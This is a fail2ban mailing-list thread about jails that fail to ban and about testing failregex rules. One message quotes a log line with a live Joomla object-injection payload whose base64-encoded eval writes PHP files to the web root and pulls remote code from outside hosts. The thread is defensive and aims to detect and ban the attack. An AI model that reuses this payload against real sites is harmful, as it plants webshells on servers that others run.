If you can give us your config files, we can help you build a really good
fail2ban setup. There's no security vulnerability in sharing your stuff -
the only thing you need to do is, do a find-and-replace and remove your
email address and servername - replace them with "*myemail.com*" and
"myserver.serv" so we can see they've been changed.
And btw, if you're worried that we will judge your files if they're too
messy or if you've made mistakes, trust me - people here don't do that.
We've *all* got terrible secrets lurking in our conf files, things we KNOW
we should've tidied up years ago but never got around to :-)
If you haven't set up a jail.local file and you're configuring everything
in jail.conf, now would be a good time to start. Every time there's an
update to fail2ban, it will wipe your config. It's easy to get this right,
so if you need a hand let me know.
Tony Collins
RMT Tier 1 Health & Safety Representative
Edgware Road Traincrew Depot
07949 228324
On 10 August 2018 at 18:15, Tony Collins <[email protected]> wrote:
> A quick and dirty way to deal with that is in your filter file.
>
> This isn't the best way but it will do it:
>
> failregex = <HOST>.*JDatabaseDriverMysql
>
> So that is using a 'regular expression' that says "the IP address,
> followed by any characters, followed by the specific string
> JDatabaseDriverMysql"
>
> Reload the jail, then see how it goes.
>
> You need to make sure that jail is also set up ok. That's why we need your
> conf and local files.
>
> When you say "apache-overflow ignores it", that might be for several
> reasons: 1) the regex might not be listed in apache-overflow.conf, or the
> log entry might be too old (in the [apache-overflow] entry in jail.local,
> "findtime" might not be long enough - and so on.
>
> The failregex I just gave you will work for it - you can test it like this:
>
> fail2ban-regex logfile.log "<HOST>.*JDatabaseDriverMysql"
> --print-all-matched
>
> Just replace logfile.log with the filename that has the offending log line
> in it
>
>
>
>
>
>
> Tony Collins
> RMT Tier 1 Health & Safety Representative
> Edgware Road Traincrew Depot
> 07949 228324
>
> On 10 August 2018 at 18:01, Mauricio Tavares <[email protected]> wrote:
>
>> On Fri, Aug 10, 2018 at 12:49 PM, Wayne Sallee <[email protected]>
>> wrote:
>> > Here is a 1 line log of a bot misbehaving:
>> >
>> > ***********************
>> > "GET /administrator/ HTTP/1.1" 307 616 5588 "-"
>> > "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\
>> "JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\
>> ";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:
>> 20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:5070:\"
>> eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JP
>> T1QnXSAuICIvdG1wL3Z1bG4yLnBocCIgOw0KJGZwPWZvcGVuKCIkY2hlY2si
>> LCJ3KyIpOw0KZndyaXRlKCRmcCxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNt
>> WjFibU4wYVc5dUlHaDBkSEJmWjJWMEtDUjFjbXdwZXcwS0NTUnBiU0E5SUdO
>> MWNteGZhVzVwZENna2RYSnNLVHNOQ2dsamRYSnNYM05sZEc5d2RDZ2thVzBz
>> SUVOVlVreFBVRlJmVWtWVVZWSk9WRkpCVGxOR1JWSXNJREVwT3cwS0NXTjFj
>> bXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5RFQwNU9SVU5VVkVsTlJV
>> OVZWQ3dnTVRBcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5
>> UVZGOUdUMHhNVDFkTVQwTkJWRWxQVGl3Z01TazdEUW9KWTNWeWJGOXpaWFJ2
>> Y0hRb0pHbHRMQ0JEVlZKTVQxQlVYMGhGUVVSRlVpd2dNQ2s3RFFvSmNtVjBk
>> WEp1SUdOMWNteGZaWGhsWXlna2FXMHBPdzBLQ1dOMWNteGZZMnh2YzJVb0pH
>> bHRLVHNOQ24wTkNpUmphR1ZqYXlBOUlDUmZVMFZTVmtWU1d5ZEVUME5WVFVW
>> T1ZGOVNUMDlVSjEwZ0xpQWlMM1J0Y0M5MmRXeHVMbkJvY0NJZ093MEtKSFJs
>> ZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0hNNkx5OXlZWGN1WjJsMGFIVmlk
>> WE5sY21OdmJuUmxiblF1WTI5dEx6QTBlQzlKUTBjdFFYVjBiMFY0Y0d4dmFY
>> Umxja0p2VkM5dFlYTjBaWEl2Wm1sc1pYTXZkWEF1Y0dod0p5azdEUW9rYjNC
>> bGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2dr
>> YjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1L
>> R1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pH
>> Tm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05
>> MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05v
>> WldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdM
>> aUFpTDJsdFlXZGxjeTkyZFd4dUxuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FI
>> UjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNtRjNMbWRwZEdoMVluVnpaWEpqYjI1
>> MFpXNTBMbU52YlM4d05IZ3ZTVU5ITFVGMWRHOUZlSEJzYjJsMFpYSkNiMVF2
>> YldGemRHVnlMMlpwYkdWekwzVndMbkJvY0NjcE93MEtKRzl3Wlc0eUlEMGda
>> bTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJq
>> SXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0da
>> cGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1Jq
>> YUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnVi
>> M1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNn
>> MEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNk
>> ZElDNGdJaTkyZFd4dUxtaDBiU0lnT3cwS0pIUmxlSFF6SUQwZ2FIUjBjRjlu
>> WlhRb0oyaDBkSEJ6T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk4NE9EQjFa
>> bUZYUmljcE93MEtKRzl3TXoxbWIzQmxiaWdrWTJobFkyc3pMQ0FuZHljcE93
>> MEtabmR5YVhSbEtDUnZjRE1zSkhSbGVIUXpLVHNOQ21aamJHOXpaU2drYjNB
>> ektUc05DZzBLRFFva1kyaGxZMnMyUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZP
>> VkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbWgwYlNJZ093MEtK
>> SFJsZUhRMklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFX
>> NHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d05qMW1iM0JsYmln
>> a1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEy
>> S1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2o4KycpKTsNCmZjbG9zZSgkZnAp
>> Ow0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2lt
>> YWdlcy92dWxuMi5waHAiIDsNCiRmcDI9Zm9wZW4oIiRjaGVjazIiLCJ3KyIp
>> Ow0KZndyaXRlKCRmcDIsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1O
>> MGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhm
>> YVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZV
>> a3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMy
>> VjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3
>> Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlH
>> VDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9K
>> R2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlH
>> TjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1Rz
>> TkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlT
>> VDA5VUoxMGdMaUFpTDNSdGNDOTJkV3h1TG5Cb2NDSWdPdzBLSkhSbGVIUWdQ
>> U0JvZEhSd1gyZGxkQ2duYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNt
>> TnZiblJsYm5RdVkyOXRMekEwZUM5SlEwY3RRWFYwYjBWNGNHeHZhWFJsY2tK
>> dlZDOXRZWE4wWlhJdlptbHNaWE12ZFhBdWNHaHdKeWs3RFFva2IzQmxiaUE5
>> SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxi
>> aXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJH
>> VmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldO
>> ckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0
>> YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJN
>> aUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwy
>> bHRZV2RsY3k5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5
>> blpYUW9KMmgwZEhCek9pOHZjbUYzTG1kcGRHaDFZblZ6WlhKamIyNTBaVzUw
>> TG1OdmJTOHdOSGd2U1VOSExVRjFkRzlGZUhCc2IybDBaWEpDYjFRdmJXRnpk
>> R1Z5TDJacGJHVnpMM1Z3TG5Cb2NDY3BPdzBLSkc5d1pXNHlJRDBnWm05d1pX
>> NG9KR05vWldOck1pd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaklzSUNS
>> MFpYaDBNaWs3RFFwbVkyeHZjMlVvSkc5d1pXNHlLVHNOQ21sbUtHWnBiR1Zm
>> WlhocGMzUnpLQ1JqYUdWamF6SXBLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmph
>> ekl1SWp3dlluSStJanNOQ24xbGJITmxJQTBLSUNCbFkyaHZJQ0p1YjNRZ1pY
>> aHBkSE15SWpzTkNtVmphRzhnSW1SdmJtVXlJQzVjYmlBaUlEc05DZzBLSkdO
>> b1pXTnJNejBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRn
>> SWk5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhReklEMGdhSFIwY0Y5blpYUW9K
>> MmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJp
>> Y3BPdzBLSkc5d016MW1iM0JsYmlna1kyaGxZMnN6TENBbmR5Y3BPdzBLWm5k
>> eWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNO
>> Q2cwS0RRb2tZMmhsWTJzMlBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNU
>> MDlVSjEwZ0xpQWlMMmx0WVdkbGN5OTJkV3h1TG1oMGJTSWdPdzBLSkhSbGVI
>> UTJJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQnpPaTh2Y0dGemRHVmlhVzR1WTI5
>> dEwzSmhkeTg0T0RCMVptRlhSaWNwT3cwS0pHOXdOajFtYjNCbGJpZ2tZMmhs
>> WTJzMkxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEWXNKSFJsZUhRMktUc05D
>> bVpqYkc5elpTZ2tiM0EyS1RzTkNqOCsnKSk7DQpmY2xvc2UoJGZwMik7DQo=
>> '));JFactory::getConfig();exit\";s:19:\"cache_name_
>> function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_
>> class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";
>> }}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
>> > ************************
>> >
>> > What's the best way to to set Fail2Ban to ban this kind of thing?
>> >
>> > [apache-overflows] ignores it.
>> >
>> If you know you will never use "feed_url" in a query, why not look
>> for it?
>> >
>> > Wayne Sallee
>> > [email protected]
>> > http://www.WayneSallee.com
>> >
>> > On 08/10/2018 11:59 AM, Tony Collins wrote:
>> >
>> > The "missed" amount is the number of log entries that didn't get dealt
>> with
>> > either under a "fail" rule or an "ignore" rule.
>> >
>> > The best thing to do is, paste in your jail.local file, as well as your
>> jail
>> > filter .conf files. And then also include some of your fail2ban.log
>> entries
>> >
>> > There could be loads of reasons why it isn't banning, and it's only
>> possible
>> > to diagnose it with a bit more info.
>> >
>> > It's easy to include more than one log file in a jail. Here's an excerpt
>> > from my jail.local:
>> >
>> > [plesk]
>> > enabled = false
>> > action = %(ipset-action)s[name=%(__name__)s, bantime="%(bantime)s",
>> > port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
>> > %(mta)s-whois-lines-logsonly[name=%(__name__)s, sender="%(sender)s",
>> > dest="%(destemail)s",
>> > logpath=/var/log/php_errors.log;/var/log/old-logs/php_errors
>> /php_errors.log.1;/var/log/plesk/httpsd_access_log;/var/
>> log/plesk/httpsd_access_log.processed;/var/log/plesk/https
>> d_access_log.processed.1,
>> > chain="%(chain)s"]
>> > logpath = /var/log/php_errors.log
>> > /var/log/old-logs/php_errors/php_errors.log.1
>> > /var/log/plesk/httpsd_access_log
>> > /var/log/plesk/httpsd_access_log.processed
>> > /var/log/plesk/httpsd_access_log.processed.1
>> >
>> > Note the two different ways of adding more than one log file - either
>> > separated with a semi-colon ---> ; <--- or, separated with a newline.
>> >
>> >
>> >
>> > Tony Collins
>> >
>> >
>> >
>> > Tony Collins
>> > RMT Tier 1 Health & Safety Representative
>> > Edgware Road Traincrew Depot
>> > 07949 228324
>> >
>> > On 10 August 2018 at 16:01, Wayne Sallee <[email protected]> wrote:
>> >>
>> >> Fial2Ban is doing nothing but sending me e-mails when I restart fail to
>> >> ban. So at least that part works. :-)
>> >>
>> >> But it's not banning.
>> >> Error statements are almost useless.
>> >> Trying to run test commands or status commands gives me info that does
>> not
>> >> help.
>> >>
>> >> What's the best way to test a jail?
>> >>
>> >> What is the proper way to include more than one log file in a jail?
>> >> How can I tell if the jail is using all listed log files?
>> >>
>> >> What does "2580 missed" mean?
>> >>
>> >> Wayne Sallee
>> >> [email protected]
>> >> http://www.WayneSallee.com
>> >>
>> >>
>> >> ------------------------------------------------------------
>> ------------------
>> >> Check out the vibrant tech community on one of the world's most
>> >> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>> >> _______________________________________________
>> >> Fail2ban-users mailing list
>> >> [email protected]
>> >> https://lists.sourceforge.net/lists/listinfo/fail2ban-users
>> >
>> >
>> >
>> >
>> > ------------------------------------------------------------
>> ------------------
>> > Check out the vibrant tech community on one of the world's most
>> > engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>> >
>> >
>> >
>> > _______________________________________________
>> > Fail2ban-users mailing list
>> > [email protected]
>> > https://lists.sourceforge.net/lists/listinfo/fail2ban-users
>> >
>> >
>> >
>> > ------------------------------------------------------------
>> ------------------
>> > Check out the vibrant tech community on one of the world's most
>> > engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>> > _______________________________________________
>> > Fail2ban-users mailing list
>> > [email protected]
>> > https://lists.sourceforge.net/lists/listinfo/fail2ban-users
>> >
>>
>> ------------------------------------------------------------
>> ------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>> _______________________________________________
>> Fail2ban-users mailing list
>> [email protected]
>> https://lists.sourceforge.net/lists/listinfo/fail2ban-users
>>
>
>
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, Slashdot.org! http://sdm.link/slashdot
_______________________________________________
Fail2ban-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/fail2ban-users
